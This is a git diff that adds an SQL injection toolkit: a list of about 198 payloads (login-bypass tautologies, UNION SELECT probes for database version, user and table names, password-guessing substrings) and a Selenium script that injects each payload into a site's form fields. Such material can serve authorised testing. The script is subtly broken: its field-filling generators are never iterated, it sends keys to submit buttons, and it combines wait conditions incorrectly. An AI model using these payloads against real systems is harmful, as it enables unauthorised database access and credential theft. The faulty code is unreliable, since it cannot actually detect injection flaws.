diff --git a/lib/attack/payloads.txt b/lib/attack/payloads.txt new file mode 100644 index 0000000..2e6a06a --- /dev/null +++ b/lib/attack/payloads.txt @@ -0,0 +1,198 @@ +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 +== += +' +' -- +' # +' – +'-- +'/* +'# +" -- +" # +"/* +' and 1='1 +' and a='a + or 1=1 + or true +' or ''=' +" or ""=" +1′) and '1′='1– +' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 +" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 + and 1=1 + and 1=1– +' and 'one'='one +' and 'one'='one– +' group by password having 1=1-- +' group by userid having 1=1-- +' group by username having 1=1-- + like '%' + or 0=0 -- + or 0=0 # + or 0=0 – +' or 0=0 # +' or 0=0 -- +' or 0=0 # +' or 0=0 – +" or 0=0 -- +" or 0=0 # +" or 0=0 – +%' or '0'='0 + or 1=1 + or 1=1-- + or 1=1/* + or 1=1# + or 1=1– +' or 1=1-- +' or '1'='1 +' or '1'='1'-- +' or '1'='1'/* +' or '1'='1'# +' or '1′='1 +' or 1=1 +' or 1=1 -- +' or 1=1 – +' or 1=1-- +' or 1=1;# +' or 1=1/* +' or 1=1# +' or 1=1– +') or '1'='1 +') or '1'='1-- +') or '1'='1'-- +') or '1'='1'/* +') or '1'='1'# +') or ('1'='1 +') or ('1'='1-- +') or ('1'='1'-- +') or ('1'='1'/* +') or ('1'='1'# +'or'1=1 +'or'1=1′ +" or "1"="1 +" or "1"="1"-- +" or "1"="1"/* +" or "1"="1"# +" or 1=1 +" or 1=1 -- +" or 1=1 – +" or 1=1-- +" or 1=1/* +" or 1=1# +" or 1=1– +") or "1"="1 +") or "1"="1"-- +") or "1"="1"/* +") or "1"="1"# +") or ("1"="1 +") or ("1"="1"-- +") or ("1"="1"/* +") or ("1"="1"# +) or '1′='1– +) or ('1′='1– +' or 1=1 LIMIT 1;# +'or 1=1 or ''=' +"or 1=1 or ""=" +' or 'a'='a +' or a=a-- +' or a=a– +') or ('a'='a +" or "a"="a +") or ("a"="a +') or ('a'='a and hi") or ("a"="a +' or 'one'='one +' or 'one'='one– +' or uid like '% +' or uname like '% +' or userid like '% +' or user like '% +' or username like '% +' or 'x'='x +') or ('x'='x +" or "x"="x +' OR 'x'='x'#; +'=' 'or' and '=' 'or' +' UNION ALL SELECT 1, @@version;# +' UNION ALL SELECT system_user(),user();# +' UNION select table_schema,table_name FROM information_Schema.tables;# +admin' and substring(password/text(),1,1)='7 +' and substring(password/text(),1,1)='7 +' or 1=1 limit 1 -- -+ +'="or' \ No newline at end of file diff --git a/lib/attack/sql_injection.py b/lib/attack/sql_injection.py new file mode 100644 index 0000000..d08a54f --- /dev/null +++ b/lib/attack/sql_injection.py @@ -0,0 +1,82 @@ +from selenium import webdriver +from selenium.webdriver.support.ui import WebDriverWait +from selenium.webdriver.support import expected_conditions as EC +from urllib3.util import parse_url +from selenium.webdriver.edge.service import Service as EdgeService +from webdriver_manager.microsoft import EdgeChromiumDriverManager + +from selenium.webdriver.common.by import By + +with open('lib/attack/payloads.txt', 'r') as f: + payloads = f.read().splitlines() + + +class SQLInjection: + selectors = { + 'input': + 'input[type="text"], input[type="email"], input[type="password"], input[type="search"], input[type="tel"], input[type="url"], input[type="number"], input[type="range"], input[type="date"], input[type="month"], input[type="week"], input[type="time"], input[type="datetime"], input[type="datetime-local"], input[type="color"], textarea', + 'submit': 'input[type="submit"], button[type="submit"]' + } + + def __init__(self, website_url: str): + self.website_url = website_url + self.driver = webdriver.ChromiumEdge( + service=EdgeService(EdgeChromiumDriverManager().install())) + options = webdriver.EdgeOptions() + options.add_argument('--headless') + self.driver.get(website_url) + WebDriverWait(self.driver, 10).until( + EC.presence_of_element_located((By.TAG_NAME, 'html'))) + self.vulnerability_found = False + + def fillInputFields(self, input_fields, payload: str): + for input_field in input_fields: + input_field.send_keys(payload) + yield input_field, payload + + def fillSubmitButtons(self, submit_buttons, payload: str): + for submit_button in submit_buttons: + submit_button.send_keys(payload) + yield submit_button, payload + + def checkVulnerability(self, payload: str): + try: + if self.driver.current_url != self.website_url: + print('SQL injection vulnerability found with payload:', + payload) + self.vulnerability_found = True + self.driver.back() + + else: + WebDriverWait(self.driver, 10).until( + EC.title_contains('Error') + or EC.title_contains('SQL error') + or EC.title_contains('Database error')) + print('SQL injection vulnerability found with payload:', + payload) + except: + pass + + def run(self): + # get input fields + input_fields = self.driver.find_elements(By.CSS_SELECTOR, + self.selectors['input']) + submit_buttons = self.driver.find_elements(By.CSS_SELECTOR, + self.selectors['submit']) + + for payload in payloads: + if self.vulnerability_found: + break + self.fillInputFields(input_fields, payload) + self.fillSubmitButtons(submit_buttons, payload) + self.checkVulnerability(payload) + + def __del__(self): + self.driver.quit() + + +if __name__ == '__main__': + # change this to your website url this is just for testing + url = parse_url('http://localhost') + sqli = SQLInjection(str(url)) + sqli.run() \ No newline at end of file